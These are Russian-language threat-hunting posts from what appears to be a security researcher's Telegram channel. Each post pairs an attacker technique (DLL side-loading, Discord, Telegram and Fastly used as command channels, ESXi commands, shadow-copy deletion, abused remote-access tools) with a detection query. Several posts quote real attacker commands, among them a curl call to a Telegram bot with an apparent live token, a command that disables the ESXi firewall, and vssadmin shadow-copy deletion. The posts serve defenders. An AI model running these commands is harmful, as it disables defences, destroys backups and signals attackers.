Друзья, всем привет!
Регистрируйтесь на предновогодний эфир и задавайте вопросы - за лучшие вручим эксклюзивные подарки!
Регистрируйтесь на предновогодний эфир и задавайте вопросы - за лучшие вручим эксклюзивные подарки!
Forwarded from BI.ZONE
This media is not supported in your browser
VIEW IN TELEGRAM
Несем вам под елочку последние новости нашей киберразведки.
В конце года соберемся, чтобы рассказать о 5 самых заметных трендах ландшафта киберугроз в России и других странах СНГ в 2025 году. А еще покажем, как применить знания на практике, чтобы усилить защиту компании в 2026-м.
18 декабря в 11:00 (мск) обсудим:
Задавайте вопросы при регистрации на эфир. За самые интересные мы вручим наш лимитированный мерч.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤1🦄1
Всем привет!
DLL Side-Loading становится всё более популярным среди злоумышленников, распространяющих массовое вредоносное ПО, поэтому сегодня мы рассмотрим технику Hijack Execution Flow: DLL (T1574.001).
Злоумышленник использовал переименованную версию
Атакующие использовали различные имена для легитимного исполняемого файла, например:
Таким образом, одной из возможностей для охоты за подобной активностью — поиск
Увидимся завтра!
English version
DLL Side-Loading становится всё более популярным среди злоумышленников, распространяющих массовое вредоносное ПО, поэтому сегодня мы рассмотрим технику Hijack Execution Flow: DLL (T1574.001).
Злоумышленник использовал переименованную версию
FoxitPDFReader.exe для загрузки вредоносной msimg32.dll, которая запускает цепочку, приводящую к загрузке PureRAT.Атакующие использовали различные имена для легитимного исполняемого файла, например:
Authentic_Job_Application_Form.exe
Project_Salary_Commission_and Benefits.exe
Compensation, Incentives, and Benefits for project participation.exe
Compensation_Benefits_Commission.exe
Digital_Marketing_Proficiency_Test.exe
Salary, Incentives, and Benefits for the Project.exe
Marketing_Performance_Test_Assignment.exe
Commission_Structure.exe
Salary_Incentives_and_Benefits_for_the_Project.exe
Pay_Benefits_Commission_Plan.exe
Таким образом, одной из возможностей для охоты за подобной активностью — поиск
FoxitPDFReader.exe с нетипичными именами:event_type: "processcreatewin"
AND
proc_file_originalfilename: "FoxitPDFReader.exe"
AND NOT
proc_file_path: "FoxitPDFReader.exe"
Увидимся завтра!
English version
👍2🤡2🗿1
Привет всем!
В некоторых случаях злоумышленникам не требуется выделенная инфраструктура C2. Они могут использовать следующую технику: Web Service (T1102).
UNC5174, например, использовал API Discord в качестве своего C2-канала. Такой подход позволил противнику имитировать легитимный трафик и обходить существующие политики безопасности.
К сожалению, домены, связанные с Discord, могут использоваться различным легитимным программным обеспечением, но всё равно это отличная цель для проактивного поиска угроз, так как это уже не первый случай, когда злоумышленники злоупотребляют ими:
Увидимся завтра!
English version
В некоторых случаях злоумышленникам не требуется выделенная инфраструктура C2. Они могут использовать следующую технику: Web Service (T1102).
UNC5174, например, использовал API Discord в качестве своего C2-канала. Такой подход позволил противнику имитировать легитимный трафик и обходить существующие политики безопасности.
К сожалению, домены, связанные с Discord, могут использоваться различным легитимным программным обеспечением, но всё равно это отличная цель для проактивного поиска угроз, так как это уже не первый случай, когда злоумышленники злоупотребляют ими:
event_type: ("dnsreqwin" OR "dnsreqnix")
AND
dns_rname: ("discord.com" OR "discord.gg")
AND NOT
proc_file_path: *discord*Увидимся завтра!
English version
❤5🤡1
Всем привет!
Давайте рассмотрим ещё один любопытный случай того, как злоумышленники злоупотребляют легитимными веб-сервисами для решения различных задач. На этот раз мы посмотрим, как они используют Telegram для получения уведомлений.
Наш сегодняшний пример — DeerStealer. Как вы можете видеть, злоумышленники использовали
Подобная активность может быть и легитимной — администраторы могут использовать Telegram для получения уведомлений, если что-то пошло не так. Тем не менее, это всё равно хорошая цель для проактивного поиска:
Увидимся завтра!
English version
Давайте рассмотрим ещё один любопытный случай того, как злоумышленники злоупотребляют легитимными веб-сервисами для решения различных задач. На этот раз мы посмотрим, как они используют Telegram для получения уведомлений.
Наш сегодняшний пример — DeerStealer. Как вы можете видеть, злоумышленники использовали
curl.exe, чтобы получить уведомление о том, что вредоносная нагрузка была выполнена:C:\WINDOWS\system32\cmd.exe /d /s /c "curl -s -X POST https://api.telegram.org/bot7972762095:AAE_DZEcCA4tkMpVK-peSGL6x4j4GMgl-3g/sendMessage -d chat_id=8093548175 -d text="undefined - executable запущен""
Подобная активность может быть и легитимной — администраторы могут использовать Telegram для получения уведомлений, если что-то пошло не так. Тем не менее, это всё равно хорошая цель для проактивного поиска:
event_type: "processcreatewin"
AND
proc_file_path: "curl.exe"
AND
cmdline: *telegram*
Увидимся завтра!
English version
🔥2🤡1
Привет всем!
Сегодня мы рассмотрим ещё несколько примеров того, как злоумышленники намеренно ослабляют уровень безопасности Windows, чтобы облегчить закрепление в системе и продвижение по ИТ-инфраструктуре.
Согласно отчёту, Ink Dragon изменял различные параметры реестра Windows для ослабления защитных механизмов: включал ограниченный администраторский режим (DisableRestrictedAdmin), отключал фильтрацию токенов для удалённых подключений (LocalAccountTokenFilterPolicy), включал учётную запись администратора DSRM (DsrmAdminLogonBehavior), а также отключал защиту уровня Process Protection Level (RunAsPPL).
Все эти поведенческие маркеры являются неплохими целями для проактивного поиска, например:
Увидимся завтра!
English version
Сегодня мы рассмотрим ещё несколько примеров того, как злоумышленники намеренно ослабляют уровень безопасности Windows, чтобы облегчить закрепление в системе и продвижение по ИТ-инфраструктуре.
Согласно отчёту, Ink Dragon изменял различные параметры реестра Windows для ослабления защитных механизмов: включал ограниченный администраторский режим (DisableRestrictedAdmin), отключал фильтрацию токенов для удалённых подключений (LocalAccountTokenFilterPolicy), включал учётную запись администратора DSRM (DsrmAdminLogonBehavior), а также отключал защиту уровня Process Protection Level (RunAsPPL).
Все эти поведенческие маркеры являются неплохими целями для проактивного поиска, например:
event_type: "registryvaluesetwin"
AND
reg_key_path: "localaccounttokenfilterpolicy"
AND
reg_value_data: "0x00000001"
Увидимся завтра!
English version
🔥3🤡1
Всем привет!
Давайте рассмотрим ещё один интересный пример того, как злоумышленники злоупотребляют легитимной инфраструктурой для C2. На этот раз — Fastly.
Kaspersky раскрыла очередную кампанию ForumTroll. В этот раз противник использовал Tuoni — коммерческий фреймворк для Red Teaming. При этом злоумышленники применяли тот же сервис для C2, что и в предыдущих кампаниях, — Fastly.
Что это значит? Мы можем использовать это в наших Threat Hunting миссиях!
Увидимся завтра!
English version
Давайте рассмотрим ещё один интересный пример того, как злоумышленники злоупотребляют легитимной инфраструктурой для C2. На этот раз — Fastly.
Kaspersky раскрыла очередную кампанию ForumTroll. В этот раз противник использовал Tuoni — коммерческий фреймворк для Red Teaming. При этом злоумышленники применяли тот же сервис для C2, что и в предыдущих кампаниях, — Fastly.
Что это значит? Мы можем использовать это в наших Threat Hunting миссиях!
event_type: "dnsreqwin"
AND
dns_rname: "fastly.net"
Увидимся завтра!
English version
🔥2🤡2👎1😁1
Всем привет!
Мы часто видим, как злоумышленники скрывают окна консоли. Но они также могут просто вынести их за пределы экрана! Давайте рассмотрим такой пример.
В этот раз мы посмотрим на Cloud Atlas (или Cloud Werewolf, как мы его отслеживаем). Злоумышленник изменил следующие ключи реестра, чтобы скрыть окна консоли:
Довольно интересно, правда? Разумеется, мы можем искать подозрительные события изменения реестра:
Увидимся завтра!
English version
Мы часто видим, как злоумышленники скрывают окна консоли. Но они также могут просто вынести их за пределы экрана! Давайте рассмотрим такой пример.
В этот раз мы посмотрим на Cloud Atlas (или Cloud Werewolf, как мы его отслеживаем). Злоумышленник изменил следующие ключи реестра, чтобы скрыть окна консоли:
HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe :: WindowPosition :: 5122
HKCU\UConsole\taskeng.exe :: WindowPosition :: 538126692
Довольно интересно, правда? Разумеется, мы можем искать подозрительные события изменения реестра:
event_type: "registryvaluesetwin"
AND
reg_key_path: "windowposition"
Увидимся завтра!
English version
🔥3🤡2👎1
Всем привет!
Когда мы говорим о группировках, использующих программы-вымогатели, мы почти всегда говорим о Command and Scripting Interpreter: Hypervisor CLI (T1059.012).
Да, банды вымогателей его обожают! Давайте посмотрим на RansomHouse, и сосредоточимся на MrAgent. Чтобы получить MAC-адрес, он выполняет следующую команду:
Для сбора информации об IP-адресе выполняется следующая команда:
Также с помощью ESXCLI отключается фаервол:
Таким образом, например, мы можем искать подозрительные команды, связанные с управлением сетевыми настройками хоста:
Увидимся завтра!
English version
Когда мы говорим о группировках, использующих программы-вымогатели, мы почти всегда говорим о Command and Scripting Interpreter: Hypervisor CLI (T1059.012).
Да, банды вымогателей его обожают! Давайте посмотрим на RansomHouse, и сосредоточимся на MrAgent. Чтобы получить MAC-адрес, он выполняет следующую команду:
esxcli --formatter=csv network nic list
Для сбора информации об IP-адресе выполняется следующая команда:
esxcli --formatter=csv network nic list
Также с помощью ESXCLI отключается фаервол:
esxcli network firewall set --enabled false
Таким образом, например, мы можем искать подозрительные команды, связанные с управлением сетевыми настройками хоста:
event_type: "processcreatenix"
AND
cmdline: ("esxcli" AND "network")
Увидимся завтра!
English version
🔥2🤡1
Всем привет!
Возможно, вы уже немного устали от того, что различные легитимные веб-сервисы используются злоумышленниками, но такие сервисы всегда являются хорошими целями для хантинга, поэтому давайте рассмотрим ещё один пример.
На этот раз злоумышленники использовали
Такие файлы содержали стеганографически внедрённую base64-кодированную сборку .NET, скрытую в конце файла. Кроме того, для её загрузки и выполнения злоумышленники использовали PowerShell.
Зная всё это, мы можем составить hunting-запрос:
Увидимся завтра!
English version
Возможно, вы уже немного устали от того, что различные легитимные веб-сервисы используются злоумышленниками, но такие сервисы всегда являются хорошими целями для хантинга, поэтому давайте рассмотрим ещё один пример.
На этот раз злоумышленники использовали
Archive[.]org для хранения вредоносных PNG-файлов, например:hxxp://dn710107.ca.archive[.]org/0/items/msi-pro-with-b-64_20251208_1511/MSI_PRO_with_b64[.]png
Такие файлы содержали стеганографически внедрённую base64-кодированную сборку .NET, скрытую в конце файла. Кроме того, для её загрузки и выполнения злоумышленники использовали PowerShell.
Зная всё это, мы можем составить hunting-запрос:
event_type: "dnsreqwin"
AND
dns_rname: "archive.org"
AND
proc_file_path: "powershell.exe"
Увидимся завтра!
English version
👍3
Всем привет!
Сегодня мы рассмотрим пример, предоставленный коллегами из Zscaler в их недавнем исследовании. И да — это снова злоупотребление легитимными сервисами!
Итак, согласно исследованию, команда Zscaler Threat Hunting зафиксировала локализованный всплеск трафика к сервису сокращения URL
Таким образом, перед нами реальный пример того, как защитники, используя знания о легитимных веб-сервисах, которыми злоупотребляют атакующие, смогли сформировать гипотезу и обнаружить ранее невыявленную вредоносную активность.
Вы можете сделать то же самое:
Увидимся завтра!
English version
Сегодня мы рассмотрим пример, предоставленный коллегами из Zscaler в их недавнем исследовании. И да — это снова злоупотребление легитимными сервисами!
Итак, согласно исследованию, команда Zscaler Threat Hunting зафиксировала локализованный всплеск трафика к сервису сокращения URL
surl[.]li. Этот сервис использовался злоумышленником (SideWinder) для перенаправления жертвы на фишинговую страницу со ссылкой на gofile[.]io, который применялся для размещения ZIP-архивов с набором файлов, включая вредоносные.Таким образом, перед нами реальный пример того, как защитники, используя знания о легитимных веб-сервисах, которыми злоупотребляют атакующие, смогли сформировать гипотезу и обнаружить ранее невыявленную вредоносную активность.
Вы можете сделать то же самое:
event_type: "dnsreqwin"
AND
dns_rname: ("surl.li" OR "gofile.io")
Увидимся завтра!
English version
👍1🔥1
Всем привет!
Пришло время взглянуть на ещё один интересный RMM, который злоумышленники используют для резервного доступа, и проверить, покрывают ли его ваши детекты.
Согласно этому отчёту, противник загрузил в скомпрометированную систему переименованную копию GotoHTTP. Интересно, что злоумышленникам достаточно просто установить этот RMM в систему, которой они хотят управлять, а для управления им нужен всего лишь веб-браузер!
Например, вы можете искать связанные сетевые сетевые соединения:
Также, разумеется, и сам бинарный файл:
Увидимся завтра!
English version
Пришло время взглянуть на ещё один интересный RMM, который злоумышленники используют для резервного доступа, и проверить, покрывают ли его ваши детекты.
Согласно этому отчёту, противник загрузил в скомпрометированную систему переименованную копию GotoHTTP. Интересно, что злоумышленникам достаточно просто установить этот RMM в систему, которой они хотят управлять, а для управления им нужен всего лишь веб-браузер!
Например, вы можете искать связанные сетевые сетевые соединения:
event_type: "dnsreqwin"
AND
dns_rname: "gotohttp.com"
Также, разумеется, и сам бинарный файл:
event_type: "processcreatewin"
AND
proc_file_productname: "gotohttp"
Увидимся завтра!
English version
🔥2
Всем привет!
Как вы знаете, злоумышленники могут удалять вредоносные файлы и инструменты для обхода защитных механизмов. Но можем ли мы использовать это для threat hunting? Давайте разберёмся!
Нам, конечно, нужен пример. Давайте посмотрим на загрузчик Amadey, описанный в этом отчёте. Злоумышленник использовал несколько команд для удаления существующего вредоносного файла и перемещения его копии в другое место:
Например, мы можем искать последовательности подозрительных команд, таких как
Увидимся завтра!
English version
Как вы знаете, злоумышленники могут удалять вредоносные файлы и инструменты для обхода защитных механизмов. Но можем ли мы использовать это для threat hunting? Давайте разберёмся!
Нам, конечно, нужен пример. Давайте посмотрим на загрузчик Amadey, описанный в этом отчёте. Злоумышленник использовал несколько команд для удаления существующего вредоносного файла и перемещения его копии в другое место:
cmd.exe /k "taskkill /f /im "Yfgfwb.exe" && timeout 1 && del "Yfgfwb.exe" && ren 07072f Yfgfwb.exe && C:\Users\UserName\Appdata\Local\Temp\067640a009\Yfgfwb.exe && Exit
Например, мы можем искать последовательности подозрительных команд, таких как
taskkill и del:event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: ("taskkill" AND "del")
Увидимся завтра!
English version
🔥2🤡1
Всем привет!
Злоумышленники могут использовать реестр Windows для решения различных задач. Некоторые из них очень распространены, другие — не очень. Давайте рассмотрим один из таких примеров!
Сегодня мы поговорим о Valley RAT. Согласно этому отчёту, он использует следующий ключ реестра для хранения загруженных плагинов:
Таким образом, с точки зрения threat hunting, мы можем искать подозрительные события изменения реестра, связанные с HKCU\Console:
Увидимся завтра!
English version
Злоумышленники могут использовать реестр Windows для решения различных задач. Некоторые из них очень распространены, другие — не очень. Давайте рассмотрим один из таких примеров!
Сегодня мы поговорим о Valley RAT. Согласно этому отчёту, он использует следующий ключ реестра для хранения загруженных плагинов:
HKCU\Console\0\d33f351a4aeea5e608853d1a56661059
Таким образом, с точки зрения threat hunting, мы можем искать подозрительные события изменения реестра, связанные с HKCU\Console:
event_type: "registryvaluesetwin"
AND
reg_key_path: "hkey_current_user\\console"
Увидимся завтра!
English version
👍2
Всем привет!
Ни для кого не секрет, что банды вымогателей часто манипулируют Volume Shadow Copy Service для Inhibit System Recovery (T1490).
В большинстве случаев это не самая удачная цель для охоты, так как злоумышленники используют эту технику на самых поздних этапах жизненного цикла атаки. В то же время они могут применять скрипты для манипуляций с этим сервисом, и это может быть вашим последним шансом обнаружить вредоносную активность.
Например, Qilin выполнял следующие команды:
Я уверен, что у вас есть правила на удаление теневых копий, но как насчёт манипуляций с самим сервисом? Поэтому может быть хорошей идеей отслеживать злоупотребление
Увидимся завтра!
English version
Ни для кого не секрет, что банды вымогателей часто манипулируют Volume Shadow Copy Service для Inhibit System Recovery (T1490).
В большинстве случаев это не самая удачная цель для охоты, так как злоумышленники используют эту технику на самых поздних этапах жизненного цикла атаки. В то же время они могут применять скрипты для манипуляций с этим сервисом, и это может быть вашим последним шансом обнаружить вредоносную активность.
Например, Qilin выполнял следующие команды:
cmd /C net start vss
cmd /C wmic service where name='vss' call ChangeStartMode Manual
cmd /C vssadmin.exe Delete Shadows /all /quiet
cmd /C net stop vss
cmd /C wmic service where name='vss' call ChangeStartMode Disabled
Я уверен, что у вас есть правила на удаление теневых копий, но как насчёт манипуляций с самим сервисом? Поэтому может быть хорошей идеей отслеживать злоупотребление
wmic.exe для управления VSS:event_type: "processcreatewin"
AND
proc_file_path: "wmic.exe"
AND
cmdline: "vss"
Увидимся завтра!
English version
🔥1
Всем привет!
Сегодня мы поговорим о том, как группы, занимающиеся вымогательством, злоупотребляют легитимным программным обеспечением для File and Directory Discovery (T1083).
А примером для сегодняшнего поста станет NightSpire. Среди прочего программного обеспечения эта группировка использовала Everything — легитимный инструмент, который позволяет злоумышленнику индексировать файлы и получить более глубокое понимание данных, доступных на скомпрометированной системе.
Таким образом, этот инструмент, особенно если он не используется широко внутри организации, может стать хорошей целью для проактивного поиска:
Увидимся завтра!
English version
Сегодня мы поговорим о том, как группы, занимающиеся вымогательством, злоупотребляют легитимным программным обеспечением для File and Directory Discovery (T1083).
А примером для сегодняшнего поста станет NightSpire. Среди прочего программного обеспечения эта группировка использовала Everything — легитимный инструмент, который позволяет злоумышленнику индексировать файлы и получить более глубокое понимание данных, доступных на скомпрометированной системе.
Таким образом, этот инструмент, особенно если он не используется широко внутри организации, может стать хорошей целью для проактивного поиска:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "everything.exe"
Увидимся завтра!
English version
🔥2
Всем привет!
Мы часто говорим о (и, конечно же, видим) LOLBAS. Поэтому давайте рассмотрим ещё один пример, который стал действительно популярным среди злоумышленников в этом году.
Итак, наш сегодняшний пример — Arcane Werewolf. Злоумышленник использует
Ещё один пример — запуск загрузчика Loki 2.0:
Как вы можете видеть, злоумышленники используют довольно подозрительные расширения файлов, поэтому мы можем использовать это для построения запроса:
Увидимся завтра!
English version
Мы часто говорим о (и, конечно же, видим) LOLBAS. Поэтому давайте рассмотрим ещё один пример, который стал действительно популярным среди злоумышленников в этом году.
Итак, наш сегодняшний пример — Arcane Werewolf. Злоумышленник использует
conhost.exe для запуска дроппера:conhost.exe C:\Users\<USER>\AppData\Local\Temp\icon2.png
Ещё один пример — запуск загрузчика Loki 2.0:
conhost.exe %TEMP%\chrome_proxy.pdf
Как вы можете видеть, злоумышленники используют довольно подозрительные расширения файлов, поэтому мы можем использовать это для построения запроса:
event_type: "processcreatewin"
AND
proc_file_path: "conhost.exe"
AND
cmdline: (*png OR *pdf)
Увидимся завтра!
English version
❤2
Всем привет!
Сегодня мы рассмотрим ещё один пример очень распространённой техники — Remote Access Tools: Remote Desktop Software (T1219.002).
У группировок, занимающихся вымогательством, в арсенале есть множество таких инструментов. Например, Power Admin — легитимный инструмент, который предоставляет функциональность для мониторинга серверов и приложений, а также для аудита доступа к файлам.
Разумеется, он может быть хорошей целью для детектирования и проактивного поиска, например:
Увидимся завтра!
English version
Сегодня мы рассмотрим ещё один пример очень распространённой техники — Remote Access Tools: Remote Desktop Software (T1219.002).
У группировок, занимающихся вымогательством, в арсенале есть множество таких инструментов. Например, Power Admin — легитимный инструмент, который предоставляет функциональность для мониторинга серверов и приложений, а также для аудита доступа к файлам.
Разумеется, он может быть хорошей целью для детектирования и проактивного поиска, например:
event_type: "processcreatewin"
AND
proc_file_productname: "pa server monitor"
Увидимся завтра!
English version
❤1
Всем привет!
Нет, сегодня никаких советов по обнаружению и охоте! И да, это последний пост в рамках Zeltser Challenge! Он определённо был непростым, но всё равно очень увлекательным.
Спасибо, Дэйв, за то, что мотивировал меня начать его! Спасибо всем, кто реагировал на посты и писал тёплые слова — это очень помогло мне довести дело до конца!
Это не значит, что я перестаю публиковать посты! Просто теперь это будет не каждый день. Но если я увижу что-то интересное — обязательно поделюсь с вами!
Спасибо, что читаете блог, и до встречи в следующем году!
English version
Нет, сегодня никаких советов по обнаружению и охоте! И да, это последний пост в рамках Zeltser Challenge! Он определённо был непростым, но всё равно очень увлекательным.
Спасибо, Дэйв, за то, что мотивировал меня начать его! Спасибо всем, кто реагировал на посты и писал тёплые слова — это очень помогло мне довести дело до конца!
Это не значит, что я перестаю публиковать посты! Просто теперь это будет не каждый день. Но если я увижу что-то интересное — обязательно поделюсь с вами!
Спасибо, что читаете блог, и до встречи в следующем году!
English version
12❤26🔥12🎅4
Всем привет!
Я обещал продолжать публиковать материалы и уведомлять вас о любых интересных тактиках, техниках и процедурах. Что ж, начнём новый год!
Харлан Карви (уверен, вы читали его книги!) поделился информацией о том, что противники начали использовать Controlio — облачную платформу для мониторинга сотрудников и аналитики продуктивности.
Кстати, это не первый случай, когда злоумышленники применяют подобные инструменты. Другой пример — Rare Werewolf: этот злоумышленник использовал Mipko Employee Monitor.
Ищите подозрительные сетевые взаимодействия с controlio[.]net:
Ищите подозрительные запуски файлов, связанных с Controlio:
Удачной охоты!
English version
Я обещал продолжать публиковать материалы и уведомлять вас о любых интересных тактиках, техниках и процедурах. Что ж, начнём новый год!
Харлан Карви (уверен, вы читали его книги!) поделился информацией о том, что противники начали использовать Controlio — облачную платформу для мониторинга сотрудников и аналитики продуктивности.
Кстати, это не первый случай, когда злоумышленники применяют подобные инструменты. Другой пример — Rare Werewolf: этот злоумышленник использовал Mipko Employee Monitor.
Ищите подозрительные сетевые взаимодействия с controlio[.]net:
event_type: "dnsreqwin"
AND
dns_rname: "controlio.net"
Ищите подозрительные запуски файлов, связанных с Controlio:
event_type: "processcreatewin"
AND
proc_file_productname: "controlio"
Удачной охоты!
English version
🔥4